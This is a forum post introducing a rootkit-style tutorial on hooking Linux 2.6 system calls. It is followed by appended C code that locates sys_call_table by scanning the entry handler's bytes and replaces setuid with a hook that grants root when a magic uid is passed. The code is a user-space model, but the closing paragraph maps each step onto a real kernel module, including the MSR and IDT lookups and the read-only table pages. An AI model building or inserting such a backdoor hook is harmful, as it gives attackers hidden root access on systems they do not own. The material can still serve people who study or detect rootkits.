Kernel Mode Hooking

Real implementations of various techniques. Source included.
oblique
Posts: 1
Joined: Wed May 05, 2010 1:17 am


Post by oblique »

In this article I will show you the basic technique that rootkits use, which we can use to hook system calls in kernel mode. I will deal only with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to hook the setuid system call, which, when it takes a "magic" uid as an argument, will give root to the process.
The article is available in Greek and English and the sections are listed below:

    0x01] Introduction
    0x02] Kernel mode hooking basic theory
    0x03] LKM - hello kernel
    0x04] Interrupt Descriptor Table (IDT)
    0x05] Get sys_call_table - Linux x86-32
    0x06] Model-Specific Registers (MSRs)
    0x07] Get sys_call_table - Linux x86-64
    0x08] Get ia32_sys_call_table - Linux x86-64
    0x09] Map to a writable memory
    0x0A] Hook a system call
    0x0B] Other ideas/methods
    0x0C] Greets
    0x0D] References
You can download the article with the source code from here.

Enjoy ;)
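Added example, not code from the article or from oblique: a user-space model of two steps in the outline above, written so it builds and runs with an ordinary C compiler. Part 1 locates sys_call_table by scanning the syscall entry handler for its dispatch instruction, which is the step that follows getting the handler address from IDT entry 0x80 (x86-32) or the LSTAR MSR (x86-64); here the handler bytes are constructed samples rather than memory read from a running kernel. Part 2 swaps the setuid entry of a table and gives root to a caller that passes a magic uid, otherwise falling through to the original. MAGIC_UID, the cred struct, the model table and all sample bytes are assumptions for the demonstration.

```c
/* Added example (not the article's code): user-space model of locating
 * sys_call_table from the entry handler's code and of hooking setuid.
 * MAGIC_UID, the cred struct, the table and the sample bytes are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <errno.h>

#define MAGIC_UID 31337u  /* constructed; a real module picks its own value */
#define NR_SETUID 105     /* __NR_setuid on x86-64 (x86-32 glibc uses __NR_setuid32 = 213) */
#define SCAN_MAX  512     /* the dispatch sits within the first few hundred bytes of the handler */

/* ---- Part 1: sys_call_table from the entry handler's machine code ----
 *   x86-64 system_call / ia32_syscall:  call *table(,%rax,8)  =>  FF 14 C5 disp32
 *   x86-32 system_call (int 0x80):      call *table(,%eax,4)  =>  FF 14 85 disp32
 * disp32 is sign-extended on x86-64; 2.6 kernel text lives in the top 2 GB, so
 * the sign-extended value is the table's virtual address. Returns 0 if not found. */
uint64_t find_syscall_table(const unsigned char *code, size_t len, int is_64bit)
{
    const unsigned char sib = is_64bit ? 0xC5 : 0x85;
    size_t i;

    if (len > SCAN_MAX)
        len = SCAN_MAX;
    for (i = 0; i + 7 <= len; i++) {
        if (code[i] != 0xFF || code[i + 1] != 0x14 || code[i + 2] != sib)
            continue;
        uint32_t disp = (uint32_t)code[i + 3] | ((uint32_t)code[i + 4] << 8) |
                        ((uint32_t)code[i + 5] << 16) | ((uint32_t)code[i + 6] << 24);
        return is_64bit ? (uint64_t)(int64_t)(int32_t)disp : (uint64_t)disp;
    }
    return 0;
}

/* Constructed handler fragments: one harmless instruction, then the dispatch. */
const unsigned char SAMPLE_ENTRY64[] = { 0x48, 0x89, 0xe6,            /* mov %rsp,%rsi */
                                         0xff, 0x14, 0xc5, 0x80, 0xe1, 0x60, 0x81 };
const size_t SAMPLE_ENTRY64_LEN = sizeof SAMPLE_ENTRY64;
const unsigned char SAMPLE_ENTRY32[] = { 0x50,                        /* push %eax */
                                         0xff, 0x14, 0x85, 0x00, 0xe1, 0x60, 0xc0 };
const size_t SAMPLE_ENTRY32_LEN = sizeof SAMPLE_ENTRY32;

/* ---- Part 2: hook the setuid entry of the table ----
 * Model of what the hook touches; in the module these are the real
 * sys_call_table (what part 1 found) and current's credentials. */
typedef long (*syscall_fn)(unsigned int uid);
struct cred { unsigned int uid, euid; };
static struct cred task_cred = { 1000, 1000 };  /* an unprivileged caller */
static struct cred *current = &task_cred;
static syscall_fn sys_call_table[256];
static syscall_fn orig_setuid;                  /* saved so the hook can fall through */

/* Model of the real sys_setuid: only root may switch to an arbitrary uid. */
static long orig_sys_setuid(unsigned int uid)
{
    if (current->euid != 0 && uid != current->uid)
        return -EPERM;
    current->uid = current->euid = uid;
    return 0;
}

/* The replacement: magic uid => root; everything else goes to the original. */
static long hooked_setuid(unsigned int uid)
{
    if (uid == MAGIC_UID) {
        /* in a 2.6.29+ module this is commit_creds(prepare_kernel_cred(NULL)) */
        current->uid = current->euid = 0;
        return 0;
    }
    return orig_setuid(uid);
}

int install_setuid_hook(syscall_fn *table)
{
    if (orig_setuid)
        return -EBUSY;               /* already hooked */
    orig_setuid = table[NR_SETUID];  /* save first, then swap the entry */
    table[NR_SETUID] = hooked_setuid;
    return 0;
}

void remove_setuid_hook(syscall_fn *table)
{
    if (orig_setuid) {
        table[NR_SETUID] = orig_setuid;
        orig_setuid = NULL;
    }
}

/* Helpers for exercising the model: fresh unprivileged caller, clean table. */
void reset_model(void)
{
    task_cred.uid = task_cred.euid = 1000;
    sys_call_table[NR_SETUID] = orig_sys_setuid;
    orig_setuid = NULL;
}
long call_setuid(unsigned int uid) { return sys_call_table[NR_SETUID](uid); }
unsigned int current_uid(void) { return current->uid; }
```

In a module the `code` argument of `find_syscall_table` is the handler address itself: on x86-64 read it with `rdmsrl(MSR_LSTAR, addr)` (MSR 0xC0000082), and for `ia32_sys_call_table` take the offset of IDT entry 0x80 after `sidt`, which is also how the x86-32 `system_call` handler is found. The write into the real table is the part the model skips: on kernels built with CONFIG_DEBUG_RODATA the page holding `sys_call_table` is read-only, which is what the "map to a writable memory" section of the article deals with before the entry can be swapped. Saving the original pointer before the swap and restoring it on unload, as above, is what keeps the system usable after the module is removed.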